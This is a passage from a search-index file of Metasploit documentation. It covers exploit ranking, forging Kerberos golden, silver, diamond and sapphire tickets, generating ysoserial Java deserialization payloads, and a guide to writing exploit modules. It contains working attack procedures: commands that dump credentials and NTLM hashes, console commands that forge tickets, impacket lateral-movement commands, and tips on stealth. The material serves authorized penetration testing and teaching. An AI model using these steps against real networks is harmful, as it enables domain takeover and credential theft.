also used when the module has no use unless specifically configured by the user (e.g.: exploit/unix/webapp/php_eval). | . The ranking value is available on the module Class object as well as on instances: . 
modcls = framework.exploits[\"windows/browser/ie_createobject\"] modcls.rank # =&gt; 600 modcls.rank_to_s # =&gt; \"excellent\" mod = modcls.new mod.rank # =&gt; 600 mod.rank_to_s # =&gt; \"excellent\" . ",
    "url": "/docs/using-metasploit/intermediate/exploit-ranking.html",
    "relUrl": "/docs/using-metasploit/intermediate/exploit-ranking.html"
  },"113": {
    "doc": "Forging tickets",
    "title": "Kerberos Ticket Forging (Golden/Silver tickets)",
    "content": "The auxiliary/admin/kerberos/forge_ticket module allows the forging of a golden, silver, diamond or sapphire ticket. ",
    "url": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#kerberos-ticket-forging-goldensilver-tickets",
    "relUrl": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#kerberos-ticket-forging-goldensilver-tickets"
  },"114": {
    "doc": "Forging tickets",
    "title": "Vulnerable Application",
    "content": "Any system that uses Kerberos as a means of authentication, e.g. Active Directory, MSSQL . ",
    "url": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#vulnerable-application",
    "relUrl": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#vulnerable-application"
  },"115": {
    "doc": "Forging tickets",
    "title": "Actions",
    "content": "The module can run the following actions: . | FORGE_SILVER - Forge a Silver ticket - forging a service ticket. [Default] | FORGE_GOLDEN - Forge a Golden ticket - forging a ticket granting ticket. | FORGE_DIAMOND - Forge a Diamond ticket - forging a ticket granting ticket by copying the PAC of another user. | FORGE_SAPPHIRE - Forge a Sapphire ticket - forging a ticket granting ticket by copying the PAC of a particular user, using the S4U2Self+U2U trick. | . ",
    "url": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#actions",
    "relUrl": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#actions"
  },"116": {
    "doc": "Forging tickets",
    "title": "Pre-Verification steps",
    "content": ". | Obtain your target’s DOMAIN via your favorite method: e.g. nmap &lt;TARGET_IP&gt; | Next retrieve the DOMAIN_SID: e.g. mimikatz # sekurlsa::logonpasswords or use auxiliary/gather/windows_secrets_dump | Finally get the NTHASH or AES key (prefer the AES key if available) of the service account you wish to target: e.g. mimikatz # sekurlsa::logonpasswords - this output contains both NTHASH and AES keys | . ",
    "url": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#pre-verification-steps",
    "relUrl": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#pre-verification-steps"
  },"117": {
    "doc": "Forging tickets",
    "title": "Module usage",
    "content": ". | Start msfconsole | Do: use auxiliary/admin/kerberos/forge_ticket | Do: set DOMAIN DW.LOCAL | Do: set DOMAIN_SID S-1-5-21-1755879683-3641577184-3486455962 | Do: set NTHASH 88E4D9FABAECF3DEC18DD80905521B29 | Do: set USER fake_user | Do: set USER_RID 500 | Do: set SPN MSSqlSvc/dc1.dw.local:1433 (Option only used for silver tickets) | Do: forge_silver to generate a silver ticket or forge_golden for a golden ticket | Use your ticket, which will have been stored as loot, against your chosen target | Example usage in impacket: export KRB5CCNAME=/path/to/ticket python3 mssqlclient.py DW.LOCAL/[email protected] -k -no-pass . | . ",
    "url": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#module-usage",
    "relUrl": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#module-usage"
  },"118": {
    "doc": "Forging tickets",
    "title": "Scenarios",
    "content": "Forge Golden ticket . Golden tickets can be used for persistence in an Active Directory environment. The forged golden ticket is actually a Ticket Granting Ticket (TGT) - which can be used to request arbitrary Service tickets. This module does not connect directly to a Key Distribution Center (KDC); it instead forges its own ticket. Golden tickets can be forged using the password hash of a stolen Kerberos krbtgt account, in NTHASH format. For golden ticket attacks, the following information is required: . | DOMAIN - The domain, i.e. adf3.local | DOMAIN_SID - This is the Security Identifier for the domain, i.e. S-1-5-21-1266190811-2419310613-1856291569 | NTHASH - The NTHASH for the krbtgt account, i.e. 767400b2c71afa35a5dca216f2389cd9 | USER - The username that will be stored within the forged ticket; this must be a user that exists in Active Directory | USER_RID - The relative identifier (RID) of the user, which will be stored within the forged ticket, i.e. Administrator accounts have a RID of 500 | . One way of extracting the krbtgt account NTHASH is to run the auxiliary/gather/windows_secrets_dump module: . msf6 &gt; use auxiliary/gather/windows_secrets_dump msf6 auxiliary(gather/windows_secrets_dump) &gt; run smb://adf3.local;Administrator:[email protected] [*] Running module against 192.168.123.13 [*] 192.168.123.13:445 - Service RemoteRegistry is already running [*] 192.168.123.13:445 - Retrieving target system bootKey [+] 192.168.123.13:445 - bootKey: 0xa03745c7a9597f105a4df1e84a5aef04 ... omitted for brevity ... 
[*] 192.168.123.13:445 - Decrypting NL$KM [*] 192.168.123.13:445 - Dumping cached hashes No cached hashes on this system [*] 192.168.123.13:445 - Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash) [*] 192.168.123.13:445 - Using the DRSUAPI method to get NTDS.DIT secrets [*] 192.168.123.13:445 - SID enumeration progress - 0 / 24 ( 0.00%) [*] 192.168.123.13:445 - SID enumeration progress - 24 / 24 ( 100%) # SID's: ADF3\\Administrator: S-1-5-21-1266190811-2419310613-1856291569-500 ADF3\\Guest: S-1-5-21-1266190811-2419310613-1856291569-501 ADF3\\krbtgt: S-1-5-21-1266190811-2419310613-1856291569-502 &lt;------------- Use the SID from here, the part before RID 502 ADF3\\DefaultAccount: S-1-5-21-1266190811-2419310613-1856291569-503 ADF3\\j.blogs: S-1-5-21-1266190811-2419310613-1856291569-1104 ADF3\\admin: S-1-5-21-1266190811-2419310613-1856291569-1112 ADF3\\DC3$: S-1-5-21-1266190811-2419310613-1856291569-1001 ADF3\\WIN10-DC3$: S-1-5-21-1266190811-2419310613-1856291569-1608 ADF3\\WIN11-DC3$: S-1-5-21-1266190811-2419310613-1856291569-1609 ... omitted for brevity ... # NTLM hashes: ADF3\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ede47af254546a82b1743953cc4950::: ADF3\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ADF3\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:767400b2c71afa35a5dca216f2389cd9::: &lt;-- The krbtgt NTHASH . With the above information a golden ticket can be forged: . msf6 auxiliary(admin/kerberos/forge_ticket) &gt; run action=FORGE_GOLDEN domain=adf3.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=767400b2c71afa35a5dca216f2389cd9 user=Administrator [+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin [*] Auxiliary module execution completed . This newly created golden ticket is a ticket granting ticket which can be used to generate service tickets without a username or password. 
Common services include WinRM, SMB, etc. Example using a golden ticket with Metasploit: . Not currently supported. Example using a golden ticket with impacket: . export KRB5CCNAME=/Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin python3 ~/impacket/examples/smbexec.py 'adf3.local/[email protected]' -dc-ip 192.168.123.13 -k -no-pass . If this is not working for you, there is a section dedicated to common errors below. Forging Silver ticket . A silver ticket is similar to a golden ticket. The user compromises the password hash of a service or computer account to forge tickets which grant persistent access to services such as SMB/LDAP/MSSQL/etc. For silver ticket attacks the following information is required: . | DOMAIN - The domain, i.e. adf3.local | DOMAIN_SID - This is the Security Identifier for the domain, i.e. S-1-5-21-1266190811-2419310613-1856291569 | NTHASH - The NTHASH for the service or computer account, i.e. 767400b2c71afa35a5dca216f2389cd9 | USER - The username that will be stored within the forged ticket; unlike with Golden tickets, this can be a non-existent user | USER_RID - The relative identifier (RID) of the user, which will be stored within the forged ticket, i.e. Administrator accounts have a RID of 500 | SPN - The Service Principal Name, i.e. CIFS for SMB access, or MSSqlSvc/dc1.dw.local:1433. Other examples can be seen by running setspn -q */* on the target | . Example Service Principal Names: . | Service Type | Service Principal Name | . | WMI | HOST or RPCSS | . | WinRM | HOST or HTTP | . | SMB | CIFS | . | LDAP | LDAP | . | MSSQL | MSSqlSvc | . One way of extracting the computer account NTHASH is to run the auxiliary/gather/windows_secrets_dump module: . 
msf6 &gt; use auxiliary/gather/windows_secrets_dump msf6 auxiliary(gather/windows_secrets_dump) &gt; run smb://adf3.local;Administrator:[email protected] [*] Running module against 192.168.123.13 [*] 192.168.123.13:445 - Service RemoteRegistry is already running [*] 192.168.123.13:445 - Retrieving target system bootKey [+] 192.168.123.13:445 - bootKey: 0xa03745c7a9597f105a4df1e84a5aef04 ... omitted for brevity ... [*] 192.168.123.13:445 - Decrypting NL$KM [*] 192.168.123.13:445 - Dumping cached hashes No cached hashes on this system [*] 192.168.123.13:445 - Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash) [*] 192.168.123.13:445 - Using the DRSUAPI method to get NTDS.DIT secrets [*] 192.168.123.13:445 - SID enumeration progress - 0 / 24 ( 0.00%) [*] 192.168.123.13:445 - SID enumeration progress - 24 / 24 ( 100%) # SID's: ADF3\\Administrator: S-1-5-21-1266190811-2419310613-1856291569-500 ADF3\\Guest: S-1-5-21-1266190811-2419310613-1856291569-501 ADF3\\krbtgt: S-1-5-21-1266190811-2419310613-1856291569-502 ADF3\\DefaultAccount: S-1-5-21-1266190811-2419310613-1856291569-503 ADF3\\j.blogs: S-1-5-21-1266190811-2419310613-1856291569-1104 ADF3\\admin: S-1-5-21-1266190811-2419310613-1856291569-1112 ADF3\\DC3$: S-1-5-21-1266190811-2419310613-1856291569-1001 &lt;------------- Use the SID from the targeted computer account, the part before RID 1001 ... omitted for brevity ... # NTLM hashes: ADF3\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ede47af254546a82b1743953cc4950::: ADF3\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ADF3\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:767400b2c71afa35a5dca216f2389cd9::: ... omitted for brevity ... ADF3\\DC3$:1001:aad3b435b51404eeaad3b435b51404ee:fbd103200439e14d4c8adad675d5f244::: &lt;-- The NTHASH for the targeted computer account . With the above information a silver ticket for SMB can be forged for the target host: . 
msf6 auxiliary(admin/kerberos/forge_ticket) &gt; run action=FORGE_SILVER domain=adf3.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=fbd103200439e14d4c8adad675d5f244 user=Administrator spn=cifs/dc3.adf3.local [+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin [*] Auxiliary module execution completed . Example using a silver ticket with impacket: . export KRB5CCNAME=/Users/user/.msf4/loot/20220901132003_default_192.168.123.13_kerberos_ticket._554255.bin python3 $code/impacket/examples/smbexec.py 'adf3.local/[email protected]' -dc-ip 192.168.123.13 -k -no-pass . Forging Diamond ticket . A diamond ticket is just a golden ticket (thus requiring knowledge of the krbtgt hash), with an attempt to be stealthier, by: . | Performing an AS-REQ request to retrieve a TGT for any user | Using the krbtgt hash to decrypt the real ticket | Setting properties of the forged PAC to mirror those in the valid TGT | Encrypting the forged ticket with the krbtgt hash | . The primary requirement of a Diamond ticket is the same: knowledge of the krbtgt hash of the domain. The DOMAIN_SID property is not required, as this is retrieved from the valid TGT. To perform the first step (retrieving the TGT), you must provide sufficient information to authenticate to the domain (i.e. RHOST, USERNAME and PASSWORD). Forging Sapphire ticket . A sapphire ticket is similar to a Diamond ticket, in that it retrieves a real TGT, and copies data from that PAC onto the forged ticket. However, instead of using the ticket retrieved in the initial authentication, an additional step is performed to retrieve a PAC for another (presumably high-privilege) user: . 
| Authenticating to the KDC | Using the S4U2Self and U2U extensions to request a TGS for a high-privilege user (this mirrors what the real user’s PAC would look like, but the ticket is unusable in high-privilege contexts) | Decrypting this information | Setting properties of the forged PAC to mirror those in the valid TGT | Encrypting the forged ticket with the krbtgt hash | . The primary requirement of a Sapphire ticket is the same as for Golden and Diamond tickets: knowledge of the krbtgt hash of the domain. The DOMAIN_SID and DOMAIN_RID properties are not required, as these are retrieved from the valid TGT. To perform the first step (retrieving the TGT), you must provide sufficient information to authenticate to the domain (i.e. RHOST, USERNAME and PASSWORD). Common Mistakes . Invalid hostname . Use the full hostname of the machine you are targeting, not just the domain: . - python3 ~/impacket/examples/smbexec.py 'adf3.local/[email protected]' -dc-ip 192.168.123.13 -k -no-pass + python3 ~/impacket/examples/smbexec.py 'adf3.local/[email protected]' -dc-ip 192.168.123.13 -k -no-pass . Invalid SPN . SPNs must be in the format */*. If this is not identical to what Active Directory is configured with, it will not work. Verbose Mode . Setting Verbose to true runs the module in a more verbose mode. This is useful when the ticket you are forging does not work as expected: in that case the module prints out the contents of the ticket after it has been forged, similar to the inspect_ticket module with the key supplied. ",
    "url": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#scenarios"
  },"119": {
    "doc": "Forging tickets",
    "title": "Forging tickets",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/forge_ticket.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/forge_ticket.html"
  },"120": {
    "doc": "Java Deserialization",
    "title": "Example code",
    "content": "In this example: . | (L11) The module includes the Msf::Exploit::JavaDeserialization mixin. | This exposes the necessary methods. | . | (L79) Then it uses the generate_java_deserialization_for_payload method to create a serialized Java object based on the CommonsCollections2 YSoSerial payload that will execute the Metasploit payload. | Note that the Metasploit payload object is passed as-is, without any conversion. | . | . 09 include Msf::Exploit::Remote::HttpClient 10 include Msf::Exploit::Powershell 11 include Msf::Exploit::JavaDeserialization 12 13 def initialize(info = {}) ... 78 def exploit 79 java_payload = generate_java_deserialization_for_payload('CommonsCollections2', payload) 80 ciphertext = aes_encrypt(java_payload) . Once the serialized object is generated and stored as java_payload, it’s then sent to the target in an exploit-specific manner. ",
    "url": "/docs/development/developing-modules/libraries/deserialization/generating-ysoserial-java-serialized-objects.html#example-code",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/generating-ysoserial-java-serialized-objects.html#example-code"
  },"121": {
    "doc": "Java Deserialization",
    "title": "Methods",
    "content": "#generate_java_deserialization_for_payload(name, payload) . This method will generate a serialized Java object that when loaded will execute the specified Metasploit payload. The payload will be converted to an operating system command using one of the supported techniques contained within this method and then passed to #generate_java_deserialization_for_command. | name - The payload name parameter must be one of the supported payloads stored in the ysoserial cache. As of this writing, the list includes: BeanShell1, Clojure, CommonsBeanutils1, CommonsCollections2, CommonsCollections3, CommonsCollections4, CommonsCollections5, CommonsCollections6, Groovy1, Hibernate1, JBossInterceptors1, JRMPClient, JSON1, JavassistWeld1, Jdk7u21, MozillaRhino1, Myfaces1, ROME, Spring1, Spring2, and Vaadin1. While ysoserial includes additional payloads that are not listed above, they are unsupported by the library due to the need for complex inputs. Should there be use cases for additional payloads, please consider opening an issue and submitting a pull request to add support. | payload - The payload object to execute on the remote system. This is the native Metasploit payload object and it will be automatically converted to an operating system command using a technique suitable for the target platform and architecture. For example, x86 Windows payloads will be converted using a Powershell command. Not all platform and architecture combinations are supported. Unsupported combinations will result in a RuntimeError being raised, which will need to be handled by the module developer. | . #generate_java_deserialization_for_command(name, shell, command) . This method will generate a serialized Java object that when loaded will execute the specified operating system command using the specified shell. Invocation of the command through the shell effectively bypasses constraints on the characters within the operating system command. | name - The payload name parameter. 
This has the same significance as the name parameter for the #generate_java_deserialization_for_payload method. | shell - The shell to use for invoking the command. This value must be one of the following: . | bash - A modified version that will invoke the command using the bash executable | cmd - A modified version that will invoke the command using the Windows cmd.exe executable. | powershell - A modified version that will invoke the command using the Windows powershell.exe executable. | . | command - The operating system command to execute upon successful deserialization of the generated object. | . ",
    "url": "/docs/development/developing-modules/libraries/deserialization/generating-ysoserial-java-serialized-objects.html#methods",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/generating-ysoserial-java-serialized-objects.html#methods"
  },"122": {
    "doc": "Java Deserialization",
    "title": "Regenerating the ysoserial_payload JSON file (MAINTAINERS ONLY)",
    "content": "Neither module developers nor users need to concern themselves with the following. On occasion, Metasploit maintainers may want to re-run the script generation to incorporate new Java serialized objects from the ysoserial tool. To avoid invoking Java (and all its dependencies) at runtime, the serialized objects are generated and cached within a JSON file. The JSON file can be refreshed using a standalone Ruby script, which comes prepackaged with a Docker image that handles downloading ysoserial and necessary dependencies. The script, Docker image and a high-level runme.sh script are stored within tools/payloads/ysoserial. An example run looks like: . $ cd ~/git/r7/metasploit-framework/tools/payloads/ysoserial $ ./runme.sh Sending build context to Docker daemon 101.8MB Step 1/8 : FROM ubuntu ---&gt; cd6d8154f1e1 Step 2/8 : RUN apt update &amp;&amp; apt -y upgrade ---&gt; Using cache ---&gt; ba7e5691ed5a Step 3/8 : RUN apt install -y wget openjdk-8-jre-headless ruby-dev make gcc ---&gt; Using cache ---&gt; d38488663627 Step 4/8 : RUN wget -q https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O ysoserial-original.jar ---&gt; Using cache ---&gt; 284ff722464b Step 5/8 : RUN wget -q https://github.com/pimps/ysoserial-modified/raw/master/target/ysoserial-modified.jar ---&gt; Using cache ---&gt; 334c1ccb6fab Step 6/8 : RUN gem install --silent diff-lcs json pry ---&gt; Using cache ---&gt; 9d452be9d01f Step 7/8 : COPY find_ysoserial_offsets.rb / ---&gt; 61b6f339590c Step 8/8 : CMD ruby /find_ysoserial_offsets.rb ---&gt; Running in ba7b14646e56 Removing intermediate container ba7b14646e56 ---&gt; f4ca5ecb6848 Successfully built f4ca5ecb6848 Successfully tagged ysoserial-payloads:latest Generating payloads for BeanShell1... Generating payloads for C3P0... 
Error while generating or serializing payload java.lang.IllegalArgumentException: Command format is: &lt;base_url&gt;:&lt;classname&gt; at ysoserial.payloads.C3P0.getObject(C3P0.java:48) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ERROR: Errored while generating 'C3P0' and it will not be supported Generating payloads for Clojure... Generating payloads for CommonsBeanutils1... Generating payloads for CommonsCollections1... Generating payloads for CommonsCollections2... Generating payloads for CommonsCollections3... Generating payloads for CommonsCollections4... Generating payloads for CommonsCollections5... Generating payloads for CommonsCollections6... Generating payloads for FileUpload1... Error while generating or serializing payload java.lang.IllegalArgumentException: Unsupported command [] at ysoserial.payloads.FileUpload1.getObject(FileUpload1.java:71) at ysoserial.payloads.FileUpload1.getObject(FileUpload1.java:40) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ERROR: Errored while generating 'FileUpload1' and it will not be supported Generating payloads for Groovy1... Generating payloads for Hibernate1... Generating payloads for Hibernate2... Error while generating or serializing payload java.sql.SQLException: DataSource name cannot be empty string at javax.sql.rowset.BaseRowSet.setDataSourceName(BaseRowSet.java:855) at com.sun.rowset.JdbcRowSetImpl.setDataSourceName(JdbcRowSetImpl.java:4307) at ysoserial.payloads.Hibernate2.getObject(Hibernate2.java:58) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ERROR: Errored while generating 'Hibernate2' and it will not be supported Generating payloads for JBossInterceptors1... Generating payloads for JRMPClient... Generating payloads for JRMPListener... 
Error while generating or serializing payload java.lang.NumberFormatException: For input string: \"\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:592) at java.lang.Integer.parseInt(Integer.java:615) at ysoserial.payloads.JRMPListener.getObject(JRMPListener.java:42) at ysoserial.payloads.JRMPListener.getObject(JRMPListener.java:34) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ERROR: Errored while generating 'JRMPListener' and it will not be supported Generating payloads for JSON1... Generating payloads for JavassistWeld1... Generating payloads for Jdk7u21... Generating payloads for Jython1... Error while generating or serializing payload java.lang.IllegalArgumentException: Unsupported command [] at ysoserial.payloads.Jython1.getObject(Jython1.java:52) at ysoserial.payloads.Jython1.getObject(Jython1.java:42) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ERROR: Errored while generating 'Jython1' and it will not be supported Generating payloads for MozillaRhino1... Generating payloads for Myfaces1... Generating payloads for Myfaces2... Error while generating or serializing payload java.lang.IllegalArgumentException: Command format is: &lt;base_url&gt;:&lt;classname&gt; at ysoserial.payloads.Myfaces2.getObject(Myfaces2.java:47) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ERROR: Errored while generating 'Myfaces2' and it will not be supported Generating payloads for ROME... Generating payloads for Spring1... Generating payloads for Spring2... Generating payloads for URLDNS... Error while generating or serializing payload java.net.MalformedURLException: no protocol: at java.net.URL.&lt;init&gt;(URL.java:593) at ysoserial.payloads.URLDNS.getObject(URLDNS.java:56) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ERROR: Errored while generating 'URLDNS' and it will not be supported Generating payloads for Vaadin1... 
Generating payloads for Wicket1... Error while generating or serializing payload java.lang.IllegalArgumentException: Bad command format. at ysoserial.payloads.Wicket1.getObject(Wicket1.java:59) at ysoserial.payloads.Wicket1.getObject(Wicket1.java:49) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ERROR: Errored while generating 'Wicket1' and it will not be supported DONE! Successfully generated 0 static payloads and 22 dynamic payloads. Skipped 8 unsupported payloads. At completion, the data/ysoserial_payloads.json file is overwritten and the 22 dynamic payloads are ready for use within the framework. Afterward, the developer should follow the standard git procedures to add and commit the new JSON file before generating a pull request and landing the updated JSON into the framework’s master branch. ",
    "url": "/docs/development/developing-modules/libraries/deserialization/generating-ysoserial-java-serialized-objects.html#regenerating-the-ysoserial_payload-json-file-maintainers-only",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/generating-ysoserial-java-serialized-objects.html#regenerating-the-ysoserial_payload-json-file-maintainers-only"
  },"123": {
    "doc": "Java Deserialization",
    "title": "Java Deserialization",
    "content": "Instead of embedding static Java serialized objects, Metasploit offers ysoserial-generated binaries with built-in randomization. The benefits of using the Metasploit library include quicker module development, easier-to-read code, and future-proof Java serialized objects. To use the ysoserial libraries, let’s look at an example from the shiro_rememberme_v124_deserialize module: . ",
    "url": "/docs/development/developing-modules/libraries/deserialization/generating-ysoserial-java-serialized-objects.html",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/generating-ysoserial-java-serialized-objects.html"
  },"124": {
    "doc": "Writing an exploit",
    "title": "On this page",
    "content": ". | Plan your module | Ranking | Template | Basic git commands | References | . The real kung-fu behind exploit development isn’t actually about which language you choose to build it in; it’s about your precise understanding of how input is processed by the application you’re debugging, and how to gain control by manipulating it. That’s right; the keyword is “debugging.” Your binjitsu (reverse-engineering) is where the real kung-fu is. However, if your goal isn’t just popping a calculator, but to weaponize the exploit, maintain it, and make it useful in the practical world, you need a development framework. And this is where Metasploit comes in. It’s a framework that’s free and open-source, actively contributed to by researchers around the world. So when you write a Metasploit exploit, you don’t have to worry about dependency issues, having the wrong version, not having enough payloads for different pentesting scenarios to choose from, etc. The idea is that all you need to do is focus on building that exploit, and nothing more. ",
    "url": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#on-this-page",
    "relUrl": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#on-this-page"
  },"125": {
    "doc": "Writing an exploit",
    "title": "Plan your module",
    "content": "First, ask yourself: will exploiting this vulnerability result in executing a payload? If not, then despite exploiting a vulnerability, for Metasploit’s purposes the module would fall into the auxiliary category. Unlike writing a proof-of-concept, when you write a Metasploit module, you need to think about how users might use it in the real world. Stealth is usually an important element to think about. Can your exploit achieve code execution without dropping a file? Can the input look more random, so it’s more difficult to detect? How about obfuscation? Is it generating unnecessary traffic? Can it be more stable without crashing the system? . Try to be precise about exploitable requirements. Usually, a bug is specific to a range of versions or even builds. If you can’t automatically check that, you need to at least mention it in the description somewhere. Some of your exploit’s techniques might also be application-specific. For example, you can take advantage of a specific behavior in the application to generate heap allocations the way you want, but maybe it’s noisier in the newer version, so that gives you some stability issues. Does it need a 3rd-party component to work that may not even be installed by everyone? Even if it is, is the component revised often enough that it could make your exploit less reliable? . Know that in the real world, your exploit can break or fail in a lot of different ways. You should try to find and fix these problems during the development and testing phase, before learning the hard way. ",
    "url": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#plan-your-module",
    "relUrl": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#plan-your-module"
  },"126": {
    "doc": "Writing an exploit",
    "title": "Ranking",
    "content": "As you can see, reliability is important to Metasploit, and we try to be more friendly about this for the users. I know what you’re thinking: “Well, if they’re using the exploit, they should understand how it works, so they know what they’re getting themselves into.” In the perfect world, yes. Knowing how a vulnerability works or how an exploit works will only benefit the user, but you see, we don’t live in the perfect world. If you’re in the middle of a penetration test, it’s very unlikely that you’ll always find the time to recreate the vulnerable environment, strip the exploit to its most basic form to debug what’s going on, and then do testing. Chances are you have a tight schedule to break into a large network, so you need to use your time carefully. Because of this, it’s important to at least have a good description and good references for the module. And of course, a ranking system that can be trusted. The Metasploit Framework has seven different rankings to indicate how reliable an exploit is. See Exploit Ranking for more details. ",
    "url": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#ranking",
    "relUrl": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#ranking"
  },"127": {
    "doc": "Writing an exploit",
    "title": "Template",
    "content": "If you have read this far, we think you are pretty impressive because it’s a lot to digest. You are probably wondering why we haven’t had a single line of code to share in the writeup. Well, as you recall, exploit development is mostly about your reversing skills. If you have all that, we shouldn’t be telling you how to write an exploit. What we’ve done so far is hopefully get your mindset dialed-in correctly about what it means to become a Metasploit exploit developer for the security community; the rest is more about how to use our mixins to build that exploit. Well, there are A LOT of mixins, so it’s impossible to go over all of them in a single page, so you must either read the API documentation, existing code examples, or look for more wiki pages we’ve written to cover specific mixins. For example, if you’re looking for a writeup about how to interact with an HTTP server, you might be interested in: How to send an HTTP Request Using HTTPClient. If you’re interested in browser exploit writing, definitely check out: How to write a browser exploit using BrowserExploitServer, etc. But of course, to begin, you most likely need a template to work with, and here it is. We’ll also explain how to fill out the required fields: . 
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking def initialize(info = {}) super( update_info( info, 'Name' => '[Vendor] [Software] [Root Cause] [Vulnerability type]', 'Description' => %q{ Say something that the user might need to know }, 'License' => MSF_LICENSE, 'Author' => [ 'Name' ], 'References' => [ [ 'URL', '' ] ], 'Platform' => 'win', 'Targets' => [ [ 'System or software version', { 'Ret' => 0x41414141 # This will be available in `target.ret` } ] ], 'Payload' => { 'BadChars' => \"\\x00\" }, 'Privileged' => false, 'DisclosureDate' => '', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] }, ) ) end def check # For the check command end def exploit # Main function end end . | Name - The Name field should begin with the name of the vendor, followed by the software. Ideally, the “Root Cause” part names the component or function in which the bug is found. And finally, the type of vulnerability the module is exploiting. | Description - The Description field should explain what the module does, things to watch out for, specific requirements; the more, the better. The goal is to let the user understand what he’s using without the need to actually read the module’s source and figure things out. And trust me, most of them don’t. | Author field is where you put your name. The format should be “Name “. If you want to have your Twitter handle there, leave it as a comment, for example: “Name # handle” . | References - The References field is an array of references related to the vulnerability or the exploit. For example, an advisory, a blog post, etc. 
Make sure you use known reference identifiers – see Module reference identifiers for a list. | Platform - The Platform field indicates what platforms are supported, for example: win, linux, osx, unix, bsd. | Targets - The Targets field is an array of systems, applications, setups, or specific versions your exploit is targeting. The second element of each target array is where you store specific metadata about that target, for example, a specific offset, a gadget, a ret address, etc. When a target is selected by the user, the metadata is loaded and tracked by a “target index”, and can be retrieved by using the target method. | Payloads - The Payloads field specifies how the payload should be encoded and generated. You can specify: Space, SaveRegisters, Prepend, PrependEncoder, BadChars, Append, AppendEncoder, MaxNops, MinNops, Encoder, Nop, EncoderType, EncoderOptions, ExtendedOptions, EncoderDontFallThrough. | DisclosureDate - The DisclosureDate is when the vulnerability was disclosed in public, in the format: “M D Y”. For example: “Apr 04 2014” . | Notes - The Notes field is a hash always containing three keys. The value of each key is an array of constants. The list of available constants can be found in the Definition of Module Reliability Side Effects and Stability. The key should be present even if the array is empty. | Stability - The Stability field describes how the exploit affects the system it’s being run on, ex: CRASH_SAFE, CRASH_OS_DOWN | Reliability - The Reliability field describes how reliable the session is that gets returned by the exploit, ex: REPEATABLE_SESSION, UNRELIABLE_SESSION | SideEffects - The SideEffects field describes the side effects caused by the exploit that the user should be aware of, ex: ARTIFACTS_ON_DISK, IOC_IN_LOGS, ACCOUNT_LOCKOUTS. | . | . Your exploit should also have a check method to support the check command, but this is optional in case it’s not possible. And finally, the exploit method is like your main method. 
Start writing your code there. An example exploit module is also available: example.rb . ",
    "url": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#template",
    "relUrl": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#template"
  },"128": {
    "doc": "Writing an exploit",
    "title": "Basic git commands",
    "content": "Metasploit no longer uses svn for source code management. Instead, we use git, so knowing some tricks with git goes a long way. We’re not here to lecture you about how awesome git is; we know it has a learning curve, and it’s not surprising to find new users making mistakes. Every once in a while, your git “rage” will kick in, and we understand. However, it’s important for you to take advantage of branching. Every time you make a module or make some changes to existing code, you should not do so on the default master branch. Why? Because when you do a msfupdate, which is Metasploit’s utility for updating your repository, it will do a git reset before merging the changes, and all your code goes away. Another mistake people tend to make is having all the changes on master before submitting a pull request. This is a bad idea because, most likely, you’re submitting other crap you don’t intend to change, or you’re probably asking us to merge other unnecessary commit histories when there only needs to be one commit. Thanks for contributing your module to the community, but no thanks to your crazy commit history. So as a habit, when you want to make something new, or change something, begin with a new branch that’s up to date with master. First off, make sure you’re on master. If you do a git status it will tell you what branch you’re currently on: . $ 